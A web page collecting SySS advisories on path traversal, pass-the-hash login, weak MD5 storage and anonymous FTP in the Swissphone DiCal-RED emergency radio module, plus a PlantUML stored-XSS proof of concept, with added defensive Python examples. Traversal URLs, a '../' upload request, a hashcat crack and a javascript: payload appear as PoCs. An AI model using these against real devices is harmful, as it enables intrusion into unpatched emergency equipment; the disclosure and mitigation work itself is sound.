This<br />is ensured by the linking of navigation (also for the transmission of position<br />data) and various radio modules."<br /><br />Due to a path traversal issue, the device is vulnerable to the disclosure<br />of arbitrary files and modification of system files, effectively leading to<br />remote code execution.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />The administrative web interface of the device is vulnerable to path traversal<br />attacks in several places.<br /><br />The functions to download or display log files can be used to access arbitrary<br />files on the device's file system.<br />The upload function for new license files can be used to write files anywhere<br />on the device's file system - possibly overwriting important system<br />configuration files, binaries or scripts.<br />Replacing files that are executed during system operation results in a full<br />compromise of the whole device.<br /><br />Note that the attacker needs to be authenticated in order to exploit these<br />vulnerabilities, i.e. know the administrative system password or its MD5<br />hash (cf. SYSS-2024-038).<br />However, due to another vulnerability (cf. 
SYSS-2024-040), authentication is<br />not required to display file contents.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />An attacker can download the file /etc/deviceconfig via the following URL:<br />http:/192.0.2.1/cgi-bin/fdmcgiwebv2.cgi?action=downloadfile&data={%22FilePath%22:%22/etc/deviceconfig%22}<br /><br />Alternatively, the same file can be viewed via<br />http:/192.0.2.1/cgi-bin/fdmcgiwebv2.cgi?action=displayfilel&data={%22FilePath%22:%22/etc/deviceconfig%22}<br /><br />The following HTTP POST request uploads a file to the root directory (/) of<br />the device's file system:<br /><br /> POST /cgi-bin/fdmcgiwebv2.cgi?action=fileupload HTTP/1.1<br /> Host: 192.0.2.1<br /> Content-Length: 190<br /> Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynMcoPJ7jKTghQbK5<br /> [...]<br /> Cookie: QSESSIONID=[...]<br /> <br /> ------WebKitFormBoundarynMcoPJ7jKTghQbK5<br /> Content-Disposition: form-data; name="binary"; filename="../poc.txt"<br /> Content-Type: text/plain<br /> <br /> PoC<br /> <br /> ------WebKitFormBoundarynMcoPJ7jKTghQbK5--<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />The manufacturer recommends not running the device in an untrusted network.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-02-29: Vulnerability discovered<br />2024-04-16: Vulnerability reported to manufacturer<br />2024-05-10: Manufacturer states that the vulnerability will not be fixed<br />2024-05-14: Vulnerability reported to CERT-Bund<br />2024-08-13: CERT-Bund informs us that the vendor declared the product EOL<br />2024-08-20: Public disclosure of vulnerability<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for DiCal-RED<br 
/> https://www.swissphone.com/solutions/components/terminals/radio-data-module-dical-red/<br />[2] SySS Security Advisory SYSS-2024-039<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-039.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Sebastian Hamann of SySS GmbH.<br /><br />E-Mail: sebastian.hamann@syss.de<br />Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc<br />Key ID: 0x9CE0E440429D8B96<br />Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. 
The<br />latest version of this security advisory is available on the SySS website.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /><br /></code></pre>
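<p>Added example, not the manufacturer's code: a default-deny dispatcher in Python for an <code>action=...&amp;data={json}</code> CGI interface of the kind described in SYSS-2024-040 (the log viewer answering without a session) and SYSS-2024-039 (<code>FilePath</code> values and upload file names escaping their directory). Every action passes the session check first and every client-supplied path is lexically confined to a fixed directory; the directory names, alias table and session store are assumptions constructed for the example.</p>

```python
import json
import posixpath
from typing import Callable, Dict, Tuple

LOG_ROOT = "/var/log/fdm"                 # assumed: directory the log viewer may read
UPLOAD_ROOT = "/var/lib/fdm/license"      # assumed: directory license uploads may land in
FILE_ALIASES = {"FdmDebugPath": "fdm_debug.log"}   # assumed alias -> file name table
ACTIVE_SESSIONS = {"constructed-valid-session"}    # constructed stand-in for a session store


class RequestError(Exception):
    def __init__(self, status: int, message: str) -> None:
        super().__init__(message)
        self.status = status
        self.message = message


def confine(root: str, requested: str) -> str:
    """Join requested onto root and refuse anything that leaves root.

    The check is lexical (no file-system access), so it is safe to run before
    any open(); absolute paths, NUL bytes and '..' escapes are all rejected.
    """
    if not requested or "\x00" in requested:
        raise RequestError(400, "empty or malformed path")
    name = requested.replace("\\", "/")
    if name.startswith("/"):
        raise RequestError(400, "absolute paths are not allowed")
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, name))
    if not candidate.startswith(root + "/"):
        raise RequestError(400, "path escapes its directory")
    return candidate


def resolve_display_target(data: Dict) -> str:
    """displayfilel/downloadfile: an alias wins over FilePath; both stay under LOG_ROOT."""
    alias = data.get("FileAlias")
    if alias:
        if alias not in FILE_ALIASES:
            raise RequestError(400, "unknown file alias")
        return confine(LOG_ROOT, FILE_ALIASES[alias])
    return confine(LOG_ROOT, str(data.get("FilePath", "")))


def resolve_upload_target(filename: str) -> str:
    """fileupload: the client-supplied name may not carry any directory component."""
    name = filename.replace("\\", "/")
    if posixpath.basename(name) != name or name in ("", ".", ".."):
        raise RequestError(400, "upload filename must be a bare file name")
    return confine(UPLOAD_ROOT, name)


# Only listed actions exist; anything else is denied. For the example the multipart
# upload's filename is passed in the JSON data instead of a multipart body.
ACTIONS: Dict[str, Callable[[Dict], str]] = {
    "displayfilel": resolve_display_target,
    "downloadfile": resolve_display_target,
    "fileupload": lambda data: resolve_upload_target(str(data.get("filename", ""))),
}


def dispatch(action: str, data_json: str, cookies: Dict[str, str]) -> Tuple[int, str]:
    """Authenticate first, then dispatch; returns (status, resolved path or message)."""
    if cookies.get("QSESSIONID") not in ACTIVE_SESSIONS:
        return 401, "authentication required"
    try:
        data = json.loads(data_json) if data_json else {}
    except json.JSONDecodeError:
        return 400, "malformed data parameter"
    handler = ACTIONS.get(action)
    if handler is None:
        return 404, "unknown action"
    try:
        return 200, handler(data)
    except RequestError as err:
        return err.status, err.message


if __name__ == "__main__":
    cookie = {"QSESSIONID": "constructed-valid-session"}
    # The advisory's displayfilel request, with and without a session.
    print(dispatch("displayfilel", '{"FilePath":"","FileAlias":"FdmDebugPath","LinesMax":0}', {}))
    print(dispatch("displayfilel", '{"FilePath":"","FileAlias":"FdmDebugPath","LinesMax":0}', cookie))
    # The traversal cases from SYSS-2024-039.
    print(dispatch("downloadfile", '{"FilePath":"/etc/deviceconfig"}', cookie))
    print(dispatch("fileupload", '{"filename":"../poc.txt"}', cookie))
```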
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA512<br /><br />Advisory ID: SYSS-2024-038<br />Product: DiCal-RED<br />Manufacturer: Swissphone Wireless AG<br />Affected Version(s): Unknown<br />Tested Version(s): 4009<br />Vulnerability Type: Use of Password Hash Instead of Password for Authentication (CWE-836)<br />Risk Level: Medium<br />Solution Status: Open<br />Manufacturer Notification: 2024-04-16<br />Solution Date: None<br />Public Disclosure: 2024-08-20<br />CVE Reference: CVE-2024-36439<br />Author of Advisory: Sebastian Hamann, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />DiCal-RED is a radio module for communication between emergency vehicles and<br />control rooms. It provides Ethernet, Wi-Fi and cellular network connectivity<br />and runs a Linux- and BusyBox-based operating system.<br /><br />The manufacturer describes the product as follows (see [1]):<br /><br />"The DiCal-Red radio data module reliably guides you to your destination. This<br />is ensured by the linking of navigation (also for the transmission of position<br />data) and various radio modules."<br /><br />Due to the use of a password hash instead of a password for authentication,<br />the device is vulnerable to unauthorized access to administrative<br />functionality.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />The device provides an administrative web interface that requests the<br />administrative system password before it can be used. 
Instead of submitting<br />the user-supplied password, its MD5 hash is calculated on the client side<br />and submitted.<br />An attacker who knows the hash of the correct password but not the password<br />itself can simply replace the value of the password URL parameter with the<br />correct hash and subsequently gain full access to the administrative web<br />interface.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />1. Access the device's web interface and log in with an arbitrary password.<br />2. Use a local proxy or browser plug-in to intercept the HTTP requests.<br /> One of them looks like this:<br />http://192.0.2.1/cgi-bin/fdmcgiwebv2.cgi?action=validatepassword&password=2ab96390c7dbe3439de74d0c9b0b1767<br />3. Replace the value of the password parameter with the hash of the correct<br /> device password.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />The manufacturer recommends not running the device in an untrusted network.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-02-29: Vulnerability discovered<br />2024-04-16: Vulnerability reported to manufacturer<br />2024-05-10: Manufacturer states that the vulnerability will not be fixed<br />2024-05-14: Vulnerability reported to CERT-Bund<br />2024-08-13: CERT-Bund informs us that the vendor declared the product EOL<br />2024-08-20: Public disclosure of vulnerability<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for DiCal-RED<br /> https://www.swissphone.com/solutions/components/terminals/radio-data-module-dical-red/<br />[2] SySS Security Advisory SYSS-2024-038<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-038.txt<br />[3] SySS Responsible 
Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Sebastian Hamann of SySS GmbH.<br /><br />E-Mail: sebastian.hamann@syss.de<br />Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc<br />Key ID: 0x9CE0E440429D8B96<br />Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS website.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /><br /></code></pre>
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA512<br /><br />Advisory ID: SYSS-2024-037<br />Product: DiCal-RED<br />Manufacturer: Swissphone Wireless AG<br />Affected Version(s): Unknown<br />Tested Version(s): 4009<br />Vulnerability Type: Use of Password Hash With Insufficient Computational Effort (CWE-916)<br />Risk Level: Medium<br />Solution Status: Open<br />Manufacturer Notification: 2024-04-16<br />Solution Date: None<br />Public Disclosure: 2024-08-20<br />CVE Reference: CVE-2024-36440<br />Author of Advisory: Sebastian Hamann, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />DiCal-RED is a radio module for communication between emergency vehicles and<br />control rooms. It provides Ethernet, Wi-Fi and cellular network connectivity<br />and runs a Linux- and BusyBox-based operating system.<br /><br />The manufacturer describes the product as follows (see [1]):<br /><br />"The DiCal-Red radio data module reliably guides you to your destination. This<br />is ensured by the linking of navigation (also for the transmission of position<br />data) and various radio modules."<br /><br />Due to a weak password hashing function, the device password is vulnerable to<br />offline brute-force attacks in order to recover the password.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />The device password is stored in the file /etc/deviceconfig as a plain MD5<br />hash, i.e. 
without any salt or computational cost function.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />root@DiCal-RED:~# cat /etc/deviceconfig<br />PasswordActive=1<br />PasswordHash="2ab96390c7dbe3439de74d0c9b0b1767"<br />[...]<br /><br />$ hashcat -m 0 -a 3 2ab96390c7dbe3439de74d0c9b0b1767 ?l?l?l?l?l?l?d<br />[...]<br />2ab96390c7dbe3439de74d0c9b0b1767:hunter2<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />The manufacturer recommends not running the device in an untrusted network.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-02-29: Vulnerability discovered<br />2024-04-16: Vulnerability reported to manufacturer<br />2024-05-10: Manufacturer states that the vulnerability will not be fixed<br />2024-05-14: Vulnerability reported to CERT-Bund<br />2024-08-13: CERT-Bund informs us that the vendor declared the product EOL<br />2024-08-20: Public disclosure of vulnerability<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for DiCal-RED<br /> https://www.swissphone.com/solutions/components/terminals/radio-data-module-dical-red/<br />[2] SySS Security Advisory SYSS-2024-037<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-037.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Sebastian Hamann of SySS GmbH.<br /><br />E-Mail: sebastian.hamann@syss.de<br />Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc<br />Key ID: 0x9CE0E440429D8B96<br />Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 
9CE0 E440 429D 8B96<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS website.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /><br /></code></pre>
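As an added example that is not code from the SySS advisories or from Swissphone (Python stands in for the device's CGI), the two advisories above are put side by side: the comparison that SYSS-2024-038 describes, where the browser submits md5(password) and the server compares it with the unsalted MD5 that SYSS-2024-037 found in /etc/deviceconfig, and an assumed server-side replacement with a salted PBKDF2 record and constant-time comparison. The record layout, iteration count and function names are assumptions, and the hardened form assumes the password is carried over TLS:

```python
"""Added example, not code from the SySS advisories or from Swissphone; Python
stands in for the device's CGI. The vulnerable part mirrors what SYSS-2024-038
(CWE-836) and SYSS-2024-037 (CWE-916) describe: the browser submits
md5(password) and /etc/deviceconfig stores that same unsalted MD5, so whoever
holds the stored value logs in without the password, and the value itself
cracks quickly. The hardened part is an assumed design: the plaintext password
is sent (over TLS) and verified against a salted PBKDF2 record."""
import hashlib
import hmac
import os

# md5("hunter2"): the PasswordHash value quoted in the SYSS-2024-037 PoC.
STORED_MD5 = "2ab96390c7dbe3439de74d0c9b0b1767"


def client_side_md5(password: str) -> str:
    """What the login page computes in the browser before submitting."""
    return hashlib.md5(password.encode()).hexdigest()


def vulnerable_validate(password_param: str, stored_hash: str = STORED_MD5) -> bool:
    """Models action=validatepassword: the 'password' parameter already IS the
    hash, so the server can only compare two hashes; the password is optional."""
    return password_param == stored_hash


# ---- hardened replacement (assumed design, not the vendor's) ----
PBKDF2_ITERATIONS = 600_000  # OWASP's 2023 figure for PBKDF2-HMAC-SHA256


def make_record(password: str, iterations: int = PBKDF2_ITERATIONS) -> dict:
    """Store a random salt plus a slow hash. The salt defeats precomputed tables
    and reuse of cracking work across hashes; the iteration count makes every
    guess of a mask attack like the one in the advisory cost ~600k HMACs."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {"alg": "pbkdf2-sha256", "iter": iterations,
            "salt": salt.hex(), "hash": dk.hex()}


def hardened_validate(password: str, record: dict) -> bool:
    """The server re-derives from the submitted password. Replaying the stored
    hash as the 'password' no longer matches, and compare_digest keeps the
    comparison time independent of where the first mismatching byte is."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(record["salt"]), record["iter"])
    return hmac.compare_digest(dk.hex(), record["hash"])


if __name__ == "__main__":
    # Vulnerable: the real password works, and so does the leaked hash alone.
    print(vulnerable_validate(client_side_md5("hunter2")))  # True
    print(vulnerable_validate(STORED_MD5))                  # True, no password needed
    # Hardened: only the password works; replaying the record's hash fails.
    rec = make_record("hunter2")
    print(hardened_validate("hunter2", rec))                # True
    print(hardened_validate(rec["hash"], rec))              # False
```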
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA512<br /><br />Advisory ID: SYSS-2024-036<br />Product: DiCal-RED<br />Manufacturer: Swissphone Wireless AG<br />Affected Version(s): Unknown<br />Tested Version(s): 4009<br />Vulnerability Type: Missing Authentication for Critical Function (CWE-306)<br />Risk Level: High<br />Solution Status: Open<br />Manufacturer Notification: 2024-04-16<br />Solution Date: None<br />Public Disclosure: 2024-08-20<br />CVE Reference: CVE-2024-36443<br />Author of Advisory: Sebastian Hamann, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />DiCal-RED is a radio module for communication between emergency vehicles and<br />control rooms. It provides Ethernet, Wi-Fi and cellular network connectivity<br />and runs a Linux- and BusyBox-based operating system.<br /><br />The manufacturer describes the product as follows (see [1]):<br /><br />"The DiCal-Red radio data module reliably guides you to your destination. This<br />is ensured by the linking of navigation (also for the transmission of position<br />data) and various radio modules."<br /><br />Due to anonymous FTP access, the device is vulnerable to the disclosure of<br />sensitive information, such as the device password's hash.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />The device provides an FTP service on TCP port 21. This service allows<br />anonymous access, i.e. logging in as the user "anonymous" with an arbitrary<br />password. Anonymous users get read access to the whole file system of the<br />device, including files that contain sensitive configuration information, such<br />as /etc/deviceconfig.<br />The respective process on the system runs as the system user "ftp". 
Therefore,<br />a few files with restrictive permissions are not accessible via FTP.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />$ ftp <IP or hostname><br />220 ProFTPD 1.3.3g Server (ProFTPD) [192.0.2.1]<br />500 OPTS UTF8 not understood<br />User (<IP or hostname>:(none)): anonymous<br />331 Anonymous login ok, send your complete email address as your password<br />Password:<br />230 Anonymous access granted, restrictions apply<br />ftp> ls<br />200 PORT command successful<br />150 Opening ASCII mode data connection for file list<br />usb2<br />mnt<br />etc<br />dev<br />proc<br />lib<br />home<br />htdocs<br />sbin<br />media<br />ram<br />linuxrc<br />root<br />gprscfg<br />run<br />usr<br />usb1<br />lost+found<br />bin<br />tmp<br />sys<br />var<br />226 Transfer complete<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />The manufacturer recommends not running the device in an untrusted network.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-02-29: Vulnerability discovered<br />2024-04-16: Vulnerability reported to manufacturer<br />2024-05-10: Manufacturer states that the vulnerability will not be fixed<br />2024-05-14: Vulnerability reported to CERT-Bund<br />2024-08-13: CERT-Bund informs us that the vendor declared the product EOL<br />2024-08-20: Public disclosure of vulnerability<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for DiCal-RED<br /> https://www.swissphone.com/solutions/components/terminals/radio-data-module-dical-red/<br />[2] SySS Security Advisory SYSS-2024-036<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-036.txt<br />[3] SySS Responsible Disclosure Policy<br /> 
https://www.syss.de/en/responsible-disclosure-policy<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Sebastian Hamann of SySS GmbH.<br /><br />E-Mail: sebastian.hamann@syss.de<br />Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc<br />Key ID: 0x9CE0E440429D8B96<br />Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS website.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /><br /></code></pre>
<pre><code>#Exploit Title: PlantUML version 1.2024.6 Cross Site Scripting (XSS)<br />#Date: 23/08/2024<br />#Exploit Author: Hosein Vita<br />#Vendor Homepage: https://plantuml.com/<br />#Version: 1.2024.6<br />#Tested on: Linux<br /><br /><br />Description:<br />This proof-of-concept demonstrates a Cross-Site Scripting (XSS) vulnerability in PlantUML. The vulnerability can be exploited by embedding malicious JavaScript within a diagram using SVG code. When the rendered element is clicked, the payload triggers an alert, demonstrating the potential for executing arbitrary scripts in the user's browser.<br /><br />Proof of Concept:<br />@startuml<br />digraph G {<br /> graph [bgcolor="white"];<br /> node [shape=box, style="rounded,filled", color="white"];<br /> heading [fillcolor="white", label=<<table border="0" cellborder="0"><tr><td align="left">Error - Failed to load the content.<br/>Please click to reload..</td></tr></table>>, URL="javascript:alert(1);"];<br />}<br />@enduml<br /><br />Alternatively, you can reproduce the issue by appending the following string to https://<plantumlserver>/plantuml/svg/:<br /><br />PK-xJWGn3Epv2YiLI64FMcwJ3cWe41BLYiBP-3Ovh6JbDIyX_fr450XHUFoOiJoEUH5S4zp2vmd0Jps5PQvSnPctb9NCqxvHfKQ2QKkuaWlrtSAc7qpEI7qfaQ8zP6QAniB_rKGOSrbWwfe_j0N6GEp6KJ4mGQWIgR4N1cPY_ctzgD8Y0d9UYZDC1pN-MgGAdCCDvdORj09NR3bHSr6KYWvZa9s_PyAjpJZFprqbr7N3CEuq-WRIeHlmtiBZmvqpHtp5RPQywXKoYPvUdktxCr_V<br />This proof-of-concept remains stored and can be shared as a link with potential victims.<br /></code></pre>
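As an added example that is not PlantUML's own code, an output-side mitigation for the issue above: the rendered SVG is passed through a sanitizer before being served, so a node carrying URL="javascript:alert(1);" loses its href while ordinary links survive, and the stripped items are returned as findings for logging. The sample SVG is constructed to resemble such output, not captured from a PlantUML server, and the function names are assumptions:

```python
"""Added example, not PlantUML's code: a defensive pass over rendered SVG before a
PlantUML-style server returns it. It drops <script> elements, on* handlers and
href/xlink:href values whose scheme is not allowlisted, which turns the PoC's
URL="javascript:alert(1);" into an inert link. SAMPLE_SVG is constructed here."""
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)         # serialize back without ns0: prefixes
ET.register_namespace("xlink", XLINK_NS)

URL_ATTRS = {"href", "{%s}href" % XLINK_NS}    # carried by <a>, <image>, <use>
ALLOWED_SCHEMES = {"http", "https", "mailto"}  # excludes javascript:, data:, vbscript:


def url_is_safe(value: str) -> bool:
    """Relative URLs pass; absolute ones need an allowlisted scheme. Control
    characters and whitespace are stripped first, since browsers ignore them
    inside the scheme ('java\\tscript:' still executes); case is ignored too."""
    v = re.sub(r"[\x00-\x20\x7f]", "", value).lower()
    m = re.match(r"^([a-z][a-z0-9+.-]*):", v)
    return m is None or m.group(1) in ALLOWED_SCHEMES


def sanitize_svg(svg_text: str):
    """Return (clean_svg, findings). findings lists what was stripped, so a
    diagram that tried to carry script can be logged or alerted on."""
    root = ET.fromstring(svg_text)
    findings = []
    parents = {child: parent for parent in root.iter() for child in parent}
    for el in list(root.iter()):                 # snapshot: we mutate the tree
        if el.tag == "{%s}script" % SVG_NS:
            parents[el].remove(el)
            findings.append("removed <script>")
    for el in root.iter():
        tag = el.tag.rsplit("}", 1)[-1]
        for name in list(el.attrib):
            local = name.rsplit("}", 1)[-1]
            if local.lower().startswith("on"):   # onclick, onload, onmouseover...
                findings.append("removed %s on <%s>" % (local, tag))
                del el.attrib[name]
            elif name in URL_ATTRS and not url_is_safe(el.attrib[name]):
                findings.append("removed unsafe URL %r on <%s>" % (el.attrib[name], tag))
                del el.attrib[name]
    return ET.tostring(root, encoding="unicode"), findings


# Constructed stand-in for what a node with URL="javascript:alert(1);" renders to.
SAMPLE_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" width="220" height="70">
  <a xlink:href="javascript:alert(1);" target="_top">
    <rect x="1" y="1" width="218" height="40" fill="white" onclick="alert(2)"/>
    <text x="10" y="25">Error - Failed to load the content. Please click to reload.</text>
  </a>
  <a href="https://plantuml.com/"><text x="10" y="60">docs</text></a>
  <script>alert(3)</script>
</svg>"""

if __name__ == "__main__":
    clean, findings = sanitize_svg(SAMPLE_SVG)
    print(clean)
    for f in findings:
        print("finding:", f)
```

Serving the sanitized SVG with a Content-Security-Policy that forbids inline script is the complementary, browser-side layer; the sanitizer above is the output-side one.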